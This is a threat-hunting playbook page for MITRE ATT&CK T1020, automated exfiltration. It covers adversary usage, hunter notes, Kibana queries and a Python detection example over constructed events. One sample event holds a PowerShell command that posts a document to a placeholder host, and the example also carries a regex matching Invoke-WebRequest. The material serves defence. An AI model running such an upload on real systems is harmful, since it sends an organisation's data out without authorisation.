# T1020 Automated Exfiltration

-----------------------------------------------------------------------

## Technique Description

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

## Technique Detection

Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.

-----------------------------------------------------------------------

### Tactics:

  *   Exfiltration

### Platforms:

  * Linux

  * macOS

  * Windows

  * Network

### Data Sources:

  * **Network Traffic:** Network Traffic Content

  * **Command:** Command Execution

  * **File:** File Access

  * **Script:** Script Execution

  * **Network Traffic:** Network Traffic Flow

  * **Network Traffic:** Network Connection Creation

-----------------------------------------------------------------------

### Adversarial usage:

| Adversary Group |  Adversarial Usage |
|----|----|
| Sidewinder | [Sidewinder](https://attack.mitre.org/groups/G0121) has configured tools to automatically send collected files to attacker controlled servers.(Citation: ATT Sidewinder January 2021)| 
| Frankenstein | [Frankenstein](https://attack.mitre.org/groups/G0101) has collected information via [Empire](https://attack.mitre.org/software/S0363), which automatically sent the data back to the adversary's C2.(Citation: Talos Frankenstein June 2019)| 
| Tropic Trooper | [Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage.(Citation: TrendMicro Tropic Trooper May 2020)| 
| Honeybee | [Honeybee](https://attack.mitre.org/groups/G0072) performs data exfiltration through the following command-line command: <code>from <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt</code>.(Citation: McAfee Honeybee)| 
| Gamaredon Group | [Gamaredon Group](https://attack.mitre.org/groups/G0047) has used modules that automatically upload gathered documents to the C2 server.(Citation: ESET Gamaredon June 2020)| 
| Ke3chang | [Ke3chang](https://attack.mitre.org/groups/G0004) has performed frequent and scheduled data exfiltration from compromised networks.(Citation: Microsoft NICKEL December 2021)| 
-----------------------------------------------------------------------

## Mitre References

  * [Mitre-Attack](https://attack.mitre.org/techniques/T1020)

> *Note: Do not edit this cell with information you want to keep. This cell will be wiped when the update script is run. Store permanent information in one of the relevant cells below.*

*Last pulled from Mitre on: 23 June 2022*



-----------------------------------------------------------------------

## Metadata

  * **Last Updated Date:** 8 July 2021

  * **Author(s):** SSgt Johnathan Smith, SSgt John Beres

  * **Validated:** NO

-----------------------------------------------------------------------

## Overall Hypothesis

- Actors may automate exfil using highly sophisticated implants or LOLBins and scripts. In contrast to operator-directed exfil, automated exfil needs to hide and blend in very well, or use a novel C2 channel hidden from admins, users, or the system itself, in order to evade detection. An implant with automated exfil is also likely intended to remain in the network on medium- to long-term timeframes, as the adversary desires a constant stream of the latest intel from the target. This tactic will often involve a mail server, or Outlook exploitation on the workstation.
- For these particular actors, automated exfil will be incorporated as a feature of highly sophisticated implants. These implants may choose to incorporate LOLBins. In contrast to operator-directed exfil, automated exfil needs to hide and blend in very well, or use a novel C2 channel hidden from admins, users, or the system itself, in order to evade detection. An implant with automated exfil is also likely intended to remain in the network on medium- to long-term timeframes, as the adversary desires a constant stream of the latest intel from the target. This tactic will often involve a mail server, or Outlook exploitation on the workstation.

## Adversary Examples

| Adversary Specific Examples | Host Analytics | Network Analytics |
|-----------------------------|----------------|-------------------|
| Example APT/Threat actor | 1, 2 | 2, 3, 5|

#### APT29
- CosmicDuke exfiltrates collected files automatically over FTP to remote servers.

#### Gamaredon Group
- Has used modules that automatically upload gathered documents to the C2 server.

#### TURLA
- LightNeuron can be configured to automatically exfiltrate files under a specified directory.

#### APT28
- USBStealer automatically exfiltrates collected files via removable media when an infected device is connected to the second victim after receiving commands from the first victim.

## Detection Blindspots

- Undocumented or missed LOLBins.
- This is primarily a network technique and operators should understand that detection will most likely come from a network analyst.

## Analytical References

  * [LOLbas-windows (github)](https://lolbas-project.github.io/)
  * [GTFObins-nix (github)](https://gtfobins.github.io/)
  * [CosmicDuke Whitepaper (f-secure)](https://www.f-secure.com/documents/996508/1030745/cosmicduke_whitepaper.pdf)
  * [Gamaredon Group Grows Its Game 2020 (welivesecurity)](https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/)
  * [ESET-LightNeuron 2019 (welivesecurity)](https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf)
  * [Sednit Espionage Group Attacking Air Gapped Networks 2014 (welivesecurity)](http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/)
  * [Mitre ATT&CK T1020](https://attack.mitre.org/techniques/T1020/)
  * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md
  * https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf

-----------------------------------------------------------------------

## Host Analytics

-----------------------------------------------------------------------

### Hunter Notes

- Focus efforts on high-value servers such as domain controllers, mail, anti-virus, and application servers. Also consider VIP workstations.
- Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.
- LightNeuron is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. LightNeuron has been used by Turla to target diplomatic and foreign affairs-related organizations.
- USBStealer is malware that has been used by APT28 since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with ADVSTORESHELL. Consequently, the analytic for USBStealer may exist instead under (T1092), or should be further developed in this analytic at a later time.
- For suspicious LOLBins, use the LOLBin listing at https://lolbas-project.github.io/ to aid in malicious identification and provide contextual working knowledge of what is occurring.
    - Are there any possibilities that can explain the activity as legitimate?
    - Is a "scoping" document available to give context for the devices in question? 
    - Are the "exfil" protocols used commonly seen across the network?
    - Can a lead or senior operator explain the activity as legitimate?
    - Can the MP explain the activity as legitimate?

Host Data Collection Procedure 1.1:

1. Identify the common/present binaries on the network capable of exfiltration. (Known/observed LOLBins: a page where a list of tools is kept with a first-observed date, name, common command-line constructions, perhaps hash and version, and a cloud of tags for its capabilities to make it searchable.)
2. Focus efforts on high-value servers such as domain controllers, mail, anti-virus, and application servers. Also consider VIP workstations.
3. After receiving approval from the Mission Commander, consider communication with the MP on findings and establish a dialogue about what they recognize as normal and what they cannot explain or understand.

Analysis:

1. Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.
2. For suspicious LOLBins, use the LOLBin listing at https://lolbas-project.github.io/ to aid in malicious identification and provide contextual working knowledge of what is occurring.
3. Are there any possibilities that can explain the activity as legitimate?
4. Is a "scoping" document available to give context for the devices in question?
5. Are the "exfil" protocols used commonly seen across the network?
6. Can a lead or senior operator explain the activity as legitimate?
7. Can the MP explain the activity as legitimate?

Host Data Collection Procedure 2.1:

1. Identify the common/present binaries on the network capable of exfiltration. (Known/observed LOLBins: a page where a list of tools is kept with a first-observed date, name, common command-line constructions, perhaps hash and version, and a cloud of tags for its capabilities to make it searchable.)
2. Focus efforts on high-value servers such as domain controllers, mail, anti-virus, and application servers. Also consider VIP workstations.

Analysis:

1. Ensure communication with the MP on findings, and establish a recorded dialogue detailing what they recognize as normal and what they cannot explain or understand.
2. Use the LOLBin listing at https://lolbas-project.github.io/ to aid in malicious identification and provide contextual working knowledge of what is occurring.

#### Analytic 1 (Turla, APT 28, APT 29)

  * **Information:** 'False Positive Rate : Medium'

  * **Information:** 'False positive rate is ultimately determined by system environment usage of FTP.'

  * **Source:** 'Windows Audits, Sysmon'

  * **Tool:** 'Kibana'

  * **Notes:** 'An outbound FTP control session from the monitored host is logged with destination port 21 and an ephemeral source port; only a server-initiated active-mode data channel arrives from source port 20, so check destination port as well when tuning this query.'

  * **Query:** ```event.code : 3 AND sourceport : (20 OR 21)```

#### Analytic 2 (Turla, APT 28, APT 29)
 
  * **Information:** 'False Positive Rate : Medium'

  * **Information:** 'Check message for Invoke-WebRequest or IWR. Moreover, understand that there may be more functions, custom or native, to perform the same action.'

  * **Source:** 'Windows Audits, Sysmon'

  * **Tool:** 'Kibana'

  * **Notes:** 

  * **Query:** ```event.code : 4104```
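The two host analytics above, plus the file-access-then-network heuristic from the detection guidance, applied to a handful of constructed ECS-style event records. This is an added example, not part of the original playbook or its Kibana queries; the field names (`code`, `pid`, `src_port`, `dst_port`, `initiated`, `script`) and the 4663 file-access records are assumed shapes rather than a specific index mapping.

```python
"""Added example: host analytics for T1020 over constructed sample events (not real telemetry)."""
from collections import defaultdict
import re

# Constructed sample events; timestamps are plain seconds for brevity.
# code 4663 = Windows object-access audit (file read), 3 = Sysmon network connection,
# 4104 = PowerShell script block logging.
EVENTS = [
    {"ts": 100, "code": 4663, "pid": 4242, "image": "C:\\Users\\u\\AppData\\x.exe", "file": "C:\\Users\\u\\Documents\\a.docx"},
    {"ts": 101, "code": 4663, "pid": 4242, "image": "C:\\Users\\u\\AppData\\x.exe", "file": "C:\\Users\\u\\Documents\\b.xlsx"},
    {"ts": 102, "code": 4663, "pid": 4242, "image": "C:\\Users\\u\\AppData\\x.exe", "file": "C:\\Users\\u\\Documents\\c.pdf"},
    {"ts": 130, "code": 3, "pid": 4242, "image": "C:\\Users\\u\\AppData\\x.exe", "src_port": 51000, "dst_port": 21, "initiated": True},
    {"ts": 200, "code": 4663, "pid": 900, "image": "C:\\Windows\\explorer.exe", "file": "C:\\Users\\u\\Documents\\a.docx"},
    {"ts": 300, "code": 3, "pid": 1200, "image": "C:\\Program Files\\Update\\svc.exe", "src_port": 52000, "dst_port": 443, "initiated": True},
    {"ts": 400, "code": 4104, "pid": 3300, "image": "powershell.exe",
     "script": "iwr -Uri http://example.invalid/upload -Method Post -InFile report.docx"},
]

# Analytic 2 keyword: the cmdlet name or its built-in alias, case-insensitive.
IWR_PATTERN = re.compile(r"\b(?:Invoke-WebRequest|iwr)\b", re.IGNORECASE)


def ftp_port_hits(events):
    """Analytic 1 with the port logic made explicit: an outbound FTP control session has
    destination port 21; a server-initiated active-mode data channel has source port 20."""
    return [e["pid"] for e in events if e["code"] == 3 and
            (e["dst_port"] == 21 or (not e["initiated"] and e["src_port"] == 20))]


def script_block_hits(events):
    """Analytic 2: 4104 script block text mentioning Invoke-WebRequest or IWR."""
    return [e["pid"] for e in events if e["code"] == 4104 and IWR_PATTERN.search(e["script"])]


def collect_then_connect(events, min_files=3, window=60):
    """Detection-guidance heuristic: a process that reads several distinct files and then
    initiates a network connection within `window` seconds of its first file access."""
    files, first, hits = defaultdict(set), {}, []
    for e in sorted(events, key=lambda x: x["ts"]):
        if e["code"] == 4663:
            files[e["pid"]].add(e["file"])
            first.setdefault(e["pid"], e["ts"])
        elif (e["code"] == 3 and e["initiated"] and len(files[e["pid"]]) >= min_files
              and e["ts"] - first[e["pid"]] <= window):
            hits.append((e["pid"], e["image"], len(files[e["pid"]])))
    return hits
```

Only `x.exe` (pid 4242) trips all three checks; `explorer.exe` touches one file and never connects, and `svc.exe` connects over 443 without prior file reads, which is the kind of baseline activity the hunter notes ask you to explain away first.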



-----------------------------------------------------------------------

## Network Analytics

-----------------------------------------------------------------------

### Hunter Notes

1. Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.
2. For suspicious LOLBins, use the LOLBin listing at https://lolbas-project.github.io/ to aid in malicious identification and provide contextual working knowledge of what is occurring.
3. Are there any possibilities that can explain the activity as legitimate?
4. Is a "scoping" document available to give context for the devices in question? 
5. Are the "exfil" protocols used commonly seen across the network?
6. Can a lead or senior operator explain the activity as legitimate?
7. Can the MP explain the activity as legitimate?

#### Analytic 1

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```

#### Analytic 2

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```

